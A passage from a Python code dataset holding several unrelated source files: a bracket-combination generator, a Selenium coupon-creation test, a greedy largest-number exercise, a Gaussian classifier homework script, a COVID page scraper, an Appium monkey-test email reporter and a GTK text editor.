'()()()(())'\n\naaaa = []\n\n\n\ndef generate_combination_helper(br, st, i, last, ret):\n \"\"\"\n :param br: bracket string\n :param st: formula string\n :param i: index of bracket\n :param last: last index in string where bracket was added\n :param ret: list of combinations\n \"\"\"\n if last == len(st) + 1:\n return\n if i == len(br) - 1:\n for j in range(last + 1, len(st) + 1, 1):\n k = [*st]\n if j != len(k):\n k.insert(j, br[i])\n else:\n k.append(br[i])\n ret.append(''.join(k))\n else:\n for j in range(last +1, len(st) + 1, 1):\n k = [*st]\n k.insert(j, br[i])\n generate_combination_helper(br, k, i+1, j,ret)\n\n\ndef generate_combination(br, st):\n \"\"\"\n :param br: bracket string\n :param st: number string\n :return: combinations\n \"\"\"\n a = []\n out = []\n generate_combination_helper(br, st, 0, -1, a)\n for i in a:\n if '()' not in i and all(f\"({j})\" not in i for j in range(1,10,1)):\n out.append(i)\n return out\n\n\ndef generate_all():\n \"\"\"\n write all combinations of '123456789' with 1-8 pairs of parentheses\n \"\"\"\n a = time.time()\n f = open(\"all_brackets2.py\", 'w')\n f.write('all_brackets = [',)\n for i, br in enumerate(newbrackets):\n\n for j in generate_combination(br, '123456789'):\n f.write(f\"'{j}', \")\n f.write('\\n')\n os.system('cls')\n if i >0:\n print(f\"{(i / len(newbrackets)) * 100}% Complete\\n ETA: {(((len(newbrackets) / i) - 1) * (time.time() - a))/60} minutes\\navg time to compute formula: {(time.time() - a) / i}\\nELAPSED:{(time.time() - a)/60} minutes\")\n f.write(']')\n f.close()\n\ndef extract_no_redundant_brackets():\n a = time.time()\n f = open(\"all_brackets3.py\", 'w')\n g = open(\"waste.txt\", 'w')\n f.write('all_brackets = [',)\n for i, br in enumerate(all_brackets2.all_brackets):\n\n if not has_redundant_brackets(br):\n f.write(f\"'{br}', \")\n else:\n g.write(f\"'{br}', \")\n if i%1000== 0 and i >0:\n f.write('\\n')\n os.system('cls')\n print(f\"{(i / len(all_brackets2.all_brackets)) * 100}% Complete\\n ETA: {(((len(all_brackets2.all_brackets) / i) - 1) * (time.time() - a))/60} minutes\\navg time to compute formula: {(time.time() - a) / i}\\nELAPSED:{(time.time() - a)/60} minutes\")\n f.write(']')\n f.close()\n g.close()\n\ndef has_redundant_brackets(formula):\n i = 0\n while i < len(formula):\n cnt = 0\n if formula[i] == '(':\n cnt += 1\n j = i + 1\n while j < len(formula):\n if formula[j].isdigit():\n if cnt == 1:\n break\n else:\n j += 1\n elif formula[j] == '(':\n j += 1\n cnt += 1\n elif formula[j] == ')':\n j += 1\n cnt -= 1\n if cnt == 0:\n return True\n i += 1\n return False\n\n\nif __name__ == \"__main__\":\n generate_all()\n extract_no_redundant_brackets()","sub_path":"brackets.py","file_name":"brackets.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"425785403","text":"# coding=utf-8\r\n# 口碑后台创建全场券(折扣、代金)\r\n\r\nfrom selenium import webdriver\r\nimport unittest, time, kbshop_login, kbshop_info, random\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\nexchange_test_address, environment = kbshop_info.exchange_url()\r\n\r\n\r\nclass CreateCrmh5PromoQC(unittest.TestCase):\r\n def setUp(self):\r\n # 调用手机模式浏览器\r\n mobileEmulation = {'deviceName': 'Nexus 4'}\r\n options = webdriver.ChromeOptions()\r\n options.add_experimental_option(\"excludeSwitches\", [\"ignore-certificate-errors\"])\r\n options.add_experimental_option('mobileEmulation', mobileEmulation)\r\n\r\n self.driver = webdriver.Chrome(\r\n executable_path=r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe',\r\n chrome_options=options)\r\n\r\n server_address = kbshop_info.base_url_info()\r\n self.base_url = server_address\r\n # self.driver.implicitly_wait(10)\r\n self.verificationErrors = []\r\n # self.driver.maximize_window()\r\n self.accept_next_alert = True\r\n\r\n def test_create_qczk(self):\r\n \"\"\"创建全场折扣券用例\"\"\"\r\n driver = self.driver\r\n # 商家登录\r\n kbshop_login.login(self) # 调用登录\r\n\r\n driver.find_element_by_xpath(\"html/body/div[1]/a[2]\").click() # 点击营销管理\r\n driver.find_element_by_xpath(\"//*[@id='carsshow_qczk']/div[4]/a\").click() # 全场折扣发券按钮\r\n # 进入发券界面\r\n\r\n # 名称添加随机数,目的是让券名保持唯一性,便于查看券是否存在\r\n i = random.randint(100, 200)\r\n subject = str(i) + \"Acrmh5全场折扣券\"\r\n brandname = str(i) + \"Acrmh5\"\r\n print(subject)\r\n # WebDriverWait(driver, 10).until(\r\n # lambda a: a.driver.find_element_by_id(\"ticketName\")).clear() # 券名称\r\n driver.find_element_by_name(\"subject\").clear() # 券名称\r\n driver.find_element_by_name(\"subject\").send_keys(subject)\r\n driver.find_element_by_id(\"brandName\").send_keys(brandname) # 品牌名称\r\n\r\n # 高级选项\r\n driver.find_element_by_xpath(\"//*[@id='senior']\").click() # 下拉到底部,否则定位不到相应元素\r\n time.sleep(2)\r\n js = \"window.scrollTo(100,900)\"\r\n driver.execute_script(js)\r\n time.sleep(2)\r\n\r\n driver.find_element_by_xpath(\"//*[@id='quanPublish']\").click() # 确认发布\r\n\r\n # driver.get(\"http://test.blibao.com/h5kbhyyx/appCrm/page/activityManage.jsp\")\r\n # 检查是否存在“券名称”\r\n tip = WebDriverWait(driver, 20).until(\r\n lambda y: y.find_element_by_xpath(\"//*[@id='activityManage']/div[1]/div[1]/div[2]/div[1]/div[1]\"))\r\n\r\n if tip.text == subject:\r\n print(\"查询到全场折扣券=\" + tip.text)\r\n else:\r\n self.assertEqual(subject, tip.text)\r\n\r\n def test_create_qcdj(self):\r\n \"\"\"创建全场代金券用例\"\"\"\r\n driver = self.driver\r\n # 商家登录\r\n kbshop_login.login(self) # 调用登录\r\n\r\n driver.find_element_by_xpath(\"html/body/div[1]/a[2]\").click() # 点击营销管理\r\n driver.find_element_by_xpath(\"//*[@id='carsshow_qcdj']/div[4]/a\").click() # 全场折扣发券按钮\r\n # 进入发券界面\r\n\r\n # 名称添加随机数,目的是让券名保持唯一性,便于查看券是否存在\r\n i = random.randint(1, 100)\r\n subject = str(i) + \"Acrmh5全场代金券\"\r\n brandname = str(i) + \"Acrmh5\"\r\n print(subject)\r\n # WebDriverWait(driver, 10).until(\r\n # lambda a: a.driver.find_element_by_id(\"ticketName\")).clear() # 券名称\r\n driver.find_element_by_name(\"subject\").clear() # 券名称\r\n driver.find_element_by_name(\"subject\").send_keys(subject)\r\n driver.find_element_by_id(\"brandName\").send_keys(brandname) # 品牌名称\r\n\r\n # 高级选项\r\n driver.find_element_by_xpath(\"//*[@id='senior']\").click() # 下拉到底部,否则定位不到相应元素\r\n time.sleep(2)\r\n js = \"window.scrollTo(100,900)\"\r\n driver.execute_script(js)\r\n time.sleep(2)\r\n\r\n driver.find_element_by_xpath(\"//*[@id='quanPublish']\").click() # 确认发布\r\n\r\n # driver.get(\"http://test.blibao.com/h5kbhyyx/appCrm/page/activityManage.jsp\")\r\n # 检查是否存在“券名称”\r\n tip = WebDriverWait(driver, 20).until(\r\n lambda y: y.find_element_by_xpath(\"//*[@id='activityManage']/div[1]/div[1]/div[2]/div[1]/div[1]\"))\r\n\r\n if tip.text == subject:\r\n print(\"查询到全场代金券=\" + tip.text)\r\n else:\r\n self.assertEqual(subject, tip.text)\r\n\r\n def tearDown(self):\r\n self.driver.close()\r\n self.driver.quit()\r\n self.assertEqual([], self.verificationErrors)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n suite = unittest.TestSuite()\r\n suite.addTest(CreateCrmh5PromoQC(\"test_create_qczk\"))\r\n suite.addTest(CreateCrmh5PromoQC(\"test_create_qcdj\"))\r\n results = unittest.TextTestRunner().run(suite)\r\n","sub_path":"blibao-project/kbht_test_case/crmh5_case/crmh5_itempromo_tocreate_qc.py","file_name":"crmh5_itempromo_tocreate_qc.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"457262545","text":"#Uses python3\n\nimport sys\n\ndef IsGreaterorEqual(a,b):\n if b == -float('inf'):\n return True\n listofa = [int(x) for x in str(a) ]\n listofb = [int(x) for x in str(b) ]\n answer = True\n looping = True\n for i in listofa:\n for j in listofb:\n if i >j:\n answer = True\n looping = False\n break\n elif i< j:\n answer = False\n looping = False\n break\n if not looping:\n break\n\n return answer\n\n# print(IsGreaterorEqual(3,41))\n# print(IsGreaterorEqual(4445,4445))\n# print(IsGreaterorEqual(45,43))\n\ndef largest_number(alist):\n answer = []\n while alist != []:\n maxDigit = -float('inf')\n for digit in alist:\n if IsGreaterorEqual(digit,maxDigit):\n maxDigit = digit\n answer.append(maxDigit)\n alist.remove(maxDigit)\n # answer = [str(x) for x in answer]\n # res = \"\"\n # for x in answer:\n # res += x\n return answer #res\n \n# copy ma\ndef IsGreaterOrEqual_2(digit, max_digit):\n return int(str(digit)+str(max_digit))>=int(str(max_digit)+str(digit))\n\ndef largest_number_copy(lst):\n answer = []\n \n while lst!=[]:\n max_digit = 0\n for digit in lst:\n if IsGreaterOrEqual_2(digit, max_digit):\n max_digit = digit\n answer.append(max_digit)\n lst.remove(max_digit)\n\n return answer\n\nprint(largest_number_copy([1,2]))\nprint(largest_number([1,2]))\n\nfrom random import randint\ndef stress_test():\n n = randint(0,299)\n test_list = [] \n for i in range(n):\n test_list.append(randint(1,3000))\n i=1\n while True:\n if largest_number_copy(test_list) == largest_number(test_list):\n print('ok',i)\n i +=1\n else:\n print('Not ok', test_list,largest_number_copy(test_list) , largest_number(test_list))\n return \n\nprint(stress_test())\n\n# if __name__ == '__main__':\n# input = sys.stdin.read()\n# data = input.split()\n# a = data[1:]\n# print(largest_number(a))\n \n","sub_path":"01AlgorithmicDesignandTechniques/week3_greedy_algorithms_starters/6_maximum_salary/largest_number.py","file_name":"largest_number.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"174711596","text":"import csv, os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef getShuffleData(arrayX, arrayY):\n arrayRandomIndex = np.arange(len(arrayX))\n np.random.shuffle(arrayRandomIndex)\n return arrayX[arrayRandomIndex], arrayY[arrayRandomIndex]\n\n\ndef getTrainAndValidData(arrayTrainAllX, arrayTrainAllY, percentage):\n intInputDataSize = len(arrayTrainAllX)\n intValidDataSize = int(np.floor(intInputDataSize * percentage))\n\n arrayTrainAllX, arrayTrainAllY = getShuffleData(arrayTrainAllX, arrayTrainAllY)\n\n arrayValidX = arrayTrainAllX[0:intValidDataSize]\n arrayTrainX = arrayTrainAllX[intValidDataSize:]\n\n arrayValidY = arrayTrainAllY[0:intValidDataSize]\n arrayTrainY = arrayTrainAllY[intValidDataSize:]\n return arrayTrainX, arrayTrainY, arrayValidX, arrayValidY\n\n\ndef getSigmoidValue(z):\n s = 1 / (1.0 + np.exp(-z))\n return np.clip(s, 1e-8, 1 - (1e-8))\n\n\nif __name__ == \"__main__\":\n\n np.random.seed(11)\n \n # read Training data, Training label, Testing data\n dfTrainX = pd.read_csv(os.path.join(os.path.dirname(__file__), \"01-Data/X_train_my.csv\"))\n dfTrainY = pd.read_csv(os.path.join(os.path.dirname(__file__), \"01-Data/Y_train_my.csv\"))\n dfTestX = pd.read_csv(os.path.join(os.path.dirname(__file__), \"01-Data/X_test_my.csv\"))\n\n # transform the data to array\n arrayTrainX = np.array(dfTrainX.values) # (32561, 106)\n arrayTestX = np.array(dfTestX.values) # (16281, 106)\n arrayTrainY = np.array(dfTrainY.values) # (32561)\n\n # take some training data to be validation data\n arrayTrainX, arrayTrainY, arrayValidX, arrayValidY = getTrainAndValidData(arrayTrainAllX=arrayTrainX, arrayTrainAllY=arrayTrainY, percentage=0.3)\n\n # calculate maximum likelihood esitimator of mu and sigma\n intTrainSize = arrayTrainX.shape[0]\n intCount1 = 0\n intCount2 = 0\n\n arrayMu1 = np.zeros(arrayTrainX.shape[1]) # (106, )\n arrayMu2 = np.zeros(arrayTrainX.shape[1]) # (106, )\n for idx in range(intTrainSize):\n if arrayTrainY[idx] == 1:\n arrayMu1 += arrayTrainX[idx]\n intCount1 += 1\n else: \n arrayMu2 += arrayTrainX[idx]\n intCount2 += 1\n\n arrayMu1 /= intCount1 \n arrayMu2 /= intCount2 \n\n arraySigma1 = np.zeros((arrayTrainX.shape[1], arrayTrainX.shape[1])) # (106, 106)\n arraySigma2 = np.zeros((arrayTrainX.shape[1], arrayTrainX.shape[1])) # (106, 106)\n for idx in range(intTrainSize):\n if arrayTrainY[idx] == 1:\n arraySigma1 += np.dot(np.transpose([arrayTrainX[idx]-arrayMu1]), [arrayTrainX[idx]-arrayMu1])\n # arraySigma1 += np.dot(np.transpose((arrayTrainX[idx]-arrayMu1)), (arrayTrainX[idx]-arrayMu1)) #can not inv\n else: \n arraySigma2 += np.dot(np.transpose([arrayTrainX[idx]-arrayMu2]), [arrayTrainX[idx]-arrayMu2])\n # arraySigma2 += np.dot(np.transpose((arrayTrainX[idx]-arrayMu2)), (arrayTrainX[idx]-arrayMu2)) #can not inv\n \n arrayCovariance = (float(intCount1)/intTrainSize) * arraySigma1 + (float(intCount2)/intTrainSize) * arraySigma2\n\n arrayCovarianceInverse = np.linalg.inv(arrayCovariance)\n\n\n # validation\n arrayW = np.dot(np.transpose((arrayMu1 - arrayMu2)), arrayCovarianceInverse)\n arrayB = -(0.5) * np.dot(np.dot(np.transpose(arrayMu1), arrayCovarianceInverse), arrayMu1) + (0.5) * np.dot(np.dot(np.transpose(arrayMu2), arrayCovarianceInverse), arrayMu2) + np.log(float(intCount1/intCount2))\n\n z = np.dot(arrayW, np.transpose(arrayValidX)) + arrayB\n s = getSigmoidValue(z)\n result = ((np.around(s)) == np.squeeze(arrayValidY))\n print(\"Vaild Accuracy:{} \".format(float(result.sum())/ len(arrayValidY)))\n\n\n # test\n ans = pd.read_csv(os.path.join(os.path.dirname(__file__), \"correct_answer.csv\"))\n z = np.dot(arrayW, np.transpose(arrayTestX)) + arrayB\n predict = np.around(getSigmoidValue(z))\n result = (predict == np.squeeze(ans[\"label\"]))\n print(\"Test Accuracy:{} \".format(float(result.sum())/ len(arrayTestX)))\n\n\n","sub_path":"李宏毅机器学习-作业/HW2/mainPG.py","file_name":"mainPG.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"253950460","text":"import os\nimport re\nimport csv\nimport boto3\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom stats.utils import get_matching_s3_cached_html, find_filename_date_matchs, get_s3_file_contents\n\nclass Command(BaseCommand):\n help = 'Get daily figures for daily death residence type'\n\n S3_HTML_BUCKET = 'static.startribune.com'\n S3_HTML_PATH = 'news/projects/all/2021-covid-scraper/raw'\n\n def handle(self, *args, **options):\n session = boto3.Session(\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,\n )\n s3 = session.client('s3')\n\n matching_files = get_matching_s3_cached_html(self.S3_HTML_BUCKET, self.S3_HTML_PATH, s3)\n noon_files = find_filename_date_matchs(matching_files, None)\n\n records = []\n\n for f in noon_files:\n print(f)\n soup = BeautifulSoup(get_s3_file_contents(f, self.S3_HTML_BUCKET, s3), 'html.parser')\n\n # total_new_deaths = None\n # total_new_deaths_section = soup.find('span', text='Newly reported deaths')\n # if total_new_deaths_section:\n # total_new_deaths = int(total_new_deaths_section.find_parent('td').find('strong').text)\n # print(total_new_deaths)\n\n homes_table = soup.find('table', id='restable')\n if not homes_table:\n print('Table not found.')\n # homes_th = soup.find('th', text=re.compile(\"Residence type.*\"))\n # if homes_th:\n # homes_table = homes_th.find_parent('tr').find_parent('table')\n else:\n\n for row in homes_table.find_all('tr')[1:]:\n # cells = row.find_all(['td'])\n try:\n facility_type = row.find('th').text\n total_cases_count = int(row.find('td').text.strip().replace(',', ''))\n print(facility_type, total_cases_count)\n if total_cases_count:\n record = {\n 'date': f['scrape_date'],\n 'facility_type': facility_type,\n 'total_cases_count': total_cases_count\n }\n\n records.append(record)\n # if total_new_deaths:\n # death_pct = round(new_death_count / total_new_deaths, 4)\n # else:\n # death_pct = None\n # record = {\n # 'date': f['scrape_date'],\n # 'facility_type': facility_type,\n # 'death_count': new_death_count,\n # 'death_pct': death_pct\n # }\n #\n # records.append(record)\n except:\n raise\n print('Error for {}'.format(f['scrape_date']))\n pass\n\n df = pd.DataFrame(records)\n # print(df.head())\n\n df.to_csv('covid_scraper/exports/total_cases_by_residence_type.csv', index=False)\n","sub_path":"stats/management/commands/aux__get_cached_ltc_cases.py","file_name":"aux__get_cached_ltc_cases.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"159487791","text":"\nimport os\nimport time\nimport smtplib\nfrom email.header import Header\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n\nfrom com.qa.automation.appium.configs import constants\n\n\nclass MonkeyHandle(object):\n def __init__(self, deviceType):\n\n if deviceType == 'android':\n from com.qa.automation.appium.configs.androidConfig import appVersion, phoneVersion, buildVersion, deviceID\n elif deviceType == 'ios':\n from com.qa.automation.appium.configs.iosConfig import appVersion, phoneVersion, buildVersion, deviceID\n else:\n raise\n\n self.appVersion = appVersion\n self.phoneVersion = phoneVersion\n self.buildVersion = buildVersion\n self.deviceID = deviceID\n\n self.startTime = ''\n self.endTime = ''\n\n self.resultMonkey = ''\n self.resultTraffic = ''\n\n self.fileNameMoneky = 'Android_monkey.log'\n self.fileNameTraffic = 'Traffic_performance.txt'\n\n def handle(self, startTime, endTime, reportPath):\n try:\n self.startTime = startTime\n self.endTime = endTime\n monkeyFilePath = os.path.join(reportPath, self.fileNameMoneky)\n trafficFilePath = os.path.join(reportPath, self.fileNameTraffic)\n if (os.path.exists(monkeyFilePath) and os.path.exists(trafficFilePath)):\n self.monkeyHandle(monkeyFilePath)\n self.trafficHandle(trafficFilePath)\n\n return self.generateReport()\n\n except Exception as e:\n print(str(e))\n\n def trafficHandle(self, filePath):\n try:\n if (filePath != ''):\n performanceData = []\n htmlContent = ''\n dataFile = open(filePath, mode='r', encoding='utf-8')\n allLines = dataFile.readlines()\n for line in allLines:\n performanceData.append(line)\n for line in performanceData:\n value = str(line).split(':')\n if (len(value) > 1):\n htmlContent = \"%s%s\" % (str(value[0]) + 's', str(value[1]) + 'Mb')\n self.resultTraffic = htmlContent\n except Exception as e:\n print(str(e))\n finally:\n dataFile.close()\n\n def monkeyHandle(self, filePath):\n try:\n if os.path.exists(filePath):\n monkeyData = self.dataHandle(filePath)\n exception = ''\n exception_list = {'空指针异常': 0,\n 'debug异常': 0,\n '低内存异常': 0,\n '操作无响应异常': 0,\n '其他异常': 0}\n for line in monkeyData:\n if 'NullPointerException' in line:\n exception = u'空指针异常'\n elif 'IllegalStateException' in line:\n exception = u'debug异常'\n elif 'OutOfMemoryError' in line:\n exception = u'低内存异常'\n elif 'NOT RESPONDING' in line:\n exception = u'操作无响应异常'\n if line == '\\n':\n if exception == '':\n exception = u'其他异常'\n exception_list[exception] = exception_list[exception] + 1\n\n avgRowContent = ''\n for key, value in exception_list.items():\n avgRowContent = avgRowContent + \"%s%s\" % (\n key, value)\n self.resultMonkey = avgRowContent\n except Exception as e:\n print(str(e))\n\n def dataHandle(self, filePath):\n monkeyData = []\n inseartValue = False\n dataFile = open(filePath, mode='r', encoding='utf-8')\n try:\n allLines = dataFile.readlines()\n for line in allLines:\n if line.startswith('// CRASH') or line.startswith('// NOT RESPONDING') or inseartValue == True:\n inseartValue = True\n if line == '\\n':\n continue\n monkeyData.append(line)\n if line.startswith('**'):\n inseartValue = False\n monkeyData.append('\\n')\n except Exception as e:\n raise\n finally:\n dataFile.close()\n\n return monkeyData\n\n def generateReport(self):\n try:\n templateHtml = self.loadHtmlTemplate()\n startTime = self.startTime\n endTime = self.endTime\n trafficResult = self.resultTraffic\n resultMonkey = self.resultMonkey\n\n templateHtml = templateHtml % (self.phoneVersion, self.deviceID, self.buildVersion, self.appVersion, startTime, endTime, trafficResult, resultMonkey)\n\n return templateHtml\n except Exception as e:\n print(str(e))\n\n def loadHtmlTemplate(self):\n resourcesDirectory = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + \"/resources/\"\n file = os.path.join(resourcesDirectory, 'templateMailMonkey.html')\n templateFile = open(file, encoding='utf-8')\n try:\n contents = templateFile.read()\n except Exception as e:\n raise\n finally:\n templateFile.close()\n return str(contents)\n\ndef sendTestResultMail(startTime, endTime, reportPath, deviceType):\n fromAddress = constants.Email.mailAddress\n toAddress = constants.Email.monkeyMaillAddress\n smtpServer = constants.Email.smtpServer\n smtpUser = constants.Email.username\n smtpPassword = constants.Email.password\n smtpPort = constants.Email.smtpPort\n\n attachmentFiles = []\n\n if deviceType == 'android':\n logcatFile = 'Android_monkey_logcat.log'\n reportFile = 'test_monkey_result.html'\n attachmentFiles.append(logcatFile)\n attachmentFiles.append(reportFile)\n elif deviceType == 'ios':\n pass\n # file = 'test_monkey_result.html'\n # reportFile = os.path.join(reportPath, 'feifan_automation_test_report_ios.html')\n else:\n raise\n\n mailBodyContents = MonkeyHandle(deviceType).handle(startTime, endTime, reportPath)\n msg = MIMEMultipart('related')\n\n body = MIMEText(mailBodyContents, 'html', 'utf-8')\n msg.attach(body)\n\n for file in attachmentFiles:\n filePath = os.path.join(reportPath, file)\n if os.path.exists(filePath):\n attach = MIMEApplication(open(filePath, 'rb').read())\n attach.add_header('Content-Disposition', 'attachment', filename=file)\n msg.attach(attach)\n\n if deviceType == 'android':\n msg['Subject'] = Header(constants.MONKEY_HEADR_NAME % (deviceType.capitalize(), time.strftime('%Y-%m-%d')), \"utf-8\")\n elif deviceType == 'ios':\n msg['Subject'] = Header(constants.MONKEY_HEADR_NAME % ('IOS', time.strftime('%Y-%m-%d')), \"utf-8\")\n else:\n raise\n msg['From'] = (r\"%s <\" + fromAddress + \">\") % Header(constants.SYSTEM_NAME, \"utf-8\")\n msg['To'] = ';'.join(toAddress)\n\n s = smtplib.SMTP(smtpServer, smtpPort)\n s.ehlo()\n s.starttls()\n s.login(smtpUser, smtpPassword)\n s.sendmail(fromAddress, toAddress, msg.as_string())\n s.quit()\n\n\nif __name__ == \"__main__\":\n reportPath = '/Users/songbo/workspace/autotest/monkey/android_monkey_log'\n sendTestResultMail('2016/10/20 03:01:00', '2016/10/20 07:06:05', reportPath, 'android')\n","sub_path":"AutoFrameworkForAppiumPy/com/qa/automation/appium/utility/monkeyMailProcess.py","file_name":"monkeyMailProcess.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"331523849","text":"#!/usr/bin/python\n\nimport gi, sys, os, pyedsettings, time\ngi.require_version('Gtk','3.0')\nfrom gi.repository import Gtk, Gdk, GtkSource\nfrom ConfigParser import SafeConfigParser\n\nclass editor(Gtk.Window):\n\t\"\"\"docstring for editor\"\"\"\n\tdef __init__(self, args):\n\t\tsuper(editor, self).__init__()\n\n\t\t#__# Global Variables and Settings #__#\n\t\tself.firstTime = True\n\t\tself.saved = False\n\t\tself.darkMode = False\n\t\tself.openLastFile = False\n\t\tself.showLines = False\n\t\tself.highlightCurrentLine = False\n\t\tself.highlightMatchingBrackets = False\n\t\tself.autoComplete = False\n\n\t\tself.config = SafeConfigParser()\n\t\tself.readConfig(self)\n\t\t#__#__#__#\n\n\t\tself.args = args\n\t\tprint(self.args)\n\t\tself.connect('destroy', Gtk.main_quit)\n\n\t\tself.set_default_size(1200, 600)\n\n\t\tself.set_title(\"Py Editor\")\n\n\t\tself.openedFile = False\n\t\tself.current = 0\n\n\t\tself.hb = Gtk.HeaderBar()\n\t\tself.hb.set_show_close_button(True)\n\t\tself._hb = Gtk.HBox(spacing=6)\n\n\t\ta = Gtk.Button.new_from_icon_name(\"document-open\", Gtk.IconSize.SMALL_TOOLBAR)\n\t\ta.connect('clicked', self.open, \"\")\n\t\tb = Gtk.Button.new_from_icon_name(\"document-save\", Gtk.IconSize.SMALL_TOOLBAR)\n\n\t\tself._hb.pack_start(a, False, False, 0)\n\t\tself._hb.pack_start(b, False, False, 0)\n\n\t\tself.hb.add(self._hb)\n\n\t\tself.set_titlebar(self.hb)\n\n\t\tself.tabs = Gtk.Notebook()\n\t\tself.tabs.connect('focus-tab', self.changeTitle)\n\t\tself.tabLabels = []\n\n\t\tself.lm = GtkSource.LanguageManager()\n\t\tself.textEditor = []\n\t\tself.textBuffer = []\n\t\tself._filePath = []\n\n\t\t\"\"\"self.textEditor.append(GtkSource.View())\n\t\tself.textBuffer.append(GtkSource.Buffer())\n\t\tself.textEditor[self.current].set_buffer(self.textBuffer[self.current])\n\t\tself.textEditor[self.current].do_show_completion(self.textEditor[self.current])\"\"\"\n\n\t\t#__#\n\n\t\t#self._scrollBar = Gtk.ScrolledWindow()\n\t\t#self._scrollBar.add(self.textEditor[self.current])\n\t\t#self.tabs.append_tab()\n\t\t#self.add(self._scrollBar)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('S'), Gdk.ModifierType.CONTROL_MASK, 0, self.save)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('O'), Gdk.ModifierType.CONTROL_MASK, 0, self.open)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('N'), Gdk.ModifierType.CONTROL_MASK, 0, self.newTab)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('P'), Gdk.ModifierType.CONTROL_MASK, 0, self.openSettings)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('R'), Gdk.ModifierType.CONTROL_MASK, 0, self._run)\n\t\tself.add_accel_group(accel)\n\n\t\t#__#\n\n\t\t\"\"\"if len(self.args) >= 2:\n\t\t\tfor i in xrange(1, len(self.args)):\n\t\t\t\tprint(\"tried to open \" + self.args[i])\n\t\t\t\tself.open(self.args[i])\n\t\telse:\n\t\t\tself.set_title(\"PyEditor\")\"\"\"\n\n\t\tself.add(self.tabs)\n\t\tself.show_all()\n\t\tself.newTab(self)\n\n\tdef changeTitle(self, *args):\n\t\tself.set_title(\"Py Editor @ \" + self.tabLabels[self.tabs.get_current_page()].get_text())\n\n\tdef newTab(self, *args):\n\t\tp = Gtk.ScrolledWindow()\n\t\tself.textEditor.append(GtkSource.View())\n\t\tself.textBuffer.append(GtkSource.Buffer())\n\t\tself.textEditor[self.current].set_buffer(self.textBuffer[self.current])\n\n\t\t#__# Settings #__#\n\n\t\tself.textEditor[self.current].set_show_line_numbers(self.showLines)\n\t\tself.textEditor[self.current].set_highlight_current_line(self.highlightCurrentLine)\n\n\t\t#__#__#__#\n\t\tp.add(self.textEditor[self.current])\n\t\tp.show_all()\n\t\tl = Gtk.Label(\"New Tab\")\n\t\tself.tabs.append_page(p, l)\n\t\tself.tabLabels.append(l)\n\t\tself.tabs.show_all()\n\t\tself.tabs.set_current_page(self.current)\n\t\tself.current += 1\n\n\tdef save(self, *args):\n\t\t\"\"\"self\"\"\"\n\t\tsiter = self.textBuffer[self.current].get_start_iter()\n\t\teiter = self.textBuffer[self.current].get_end_iter()\n\t\ttext = self.textBuffer[self.current].get_text(siter, eiter, False)\n\t\tfile = open(self._filePath[self.current], 'w')\n\t\tfile.write(text)\n\t\tfile.close()\n\n\n\tdef open(self, __file, *args):\n\t\t\"\"\"self\"\"\"\n\t\tdialog = Gtk.FileChooserDialog(\"Open File\", self, Gtk.FileChooserAction.OPEN, (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n\t\tresponse = dialog.run()\n\t\tif response == Gtk.ResponseType.OK:\n\t\t\t_file = open(dialog.get_filename())\n\t\t\ttext = _file.read()\n\t\t\t_file.close()\n\t\t\tself.openedFile = True\n\t\t\tself.newTab(self)\n\t\t\tself.filePath = dialog.get_filename()\n\t\t\tself.textBuffer[self.current - 1].set_text(text)\n\t\t\tlanguage = self.lm.guess_language(dialog.get_filename())\n\t\t\tif language:\n\t\t\t\tprint (language.get_name())\n\t\t\t\tself.textBuffer[self.current - 1].set_highlight_syntax(True)\n\t\t\t\tself.textBuffer[self.current - 1].set_language(language)\n\t\t\tself._filePath.append(dialog.get_filename())\n\t\t\tself.tabLabels[self.current - 1].set_text(os.path.basename(dialog.get_filename()))\n\t\t\tself.set_title(\"Py Editor @ \" + self.tabLabels[self.tabs.get_current_page()].get_text())\n\t\tdialog.destroy()\n\t\t\"\"\"\t# this is supposed to open a file received via argument e.g.: self.open(\"file.txt\") (not working)\n\t\t\t_file = open(__file)\n\t\t\ttext = _file.read()\n\t\t\t_file.close()\n\t\t\tself.openedFile = True\n\t\t\tself.textBuffer[self.current].set_text(text)\n\t\t\tlanguage = self.lm.guess_language(__file)\n\t\t\tif language:\n\t\t\t\tself.textBuffer[self.current].set_highlight_syntax(True)\n\t\t\t\tself.textBuffer[self.current].set_language(language)\n\t\t\tself._filePath.append(__file)\n\t\t\tself.set_title(\"Py Editor @ \" + __file)\"\"\"\n\n\tdef readConfig(self, 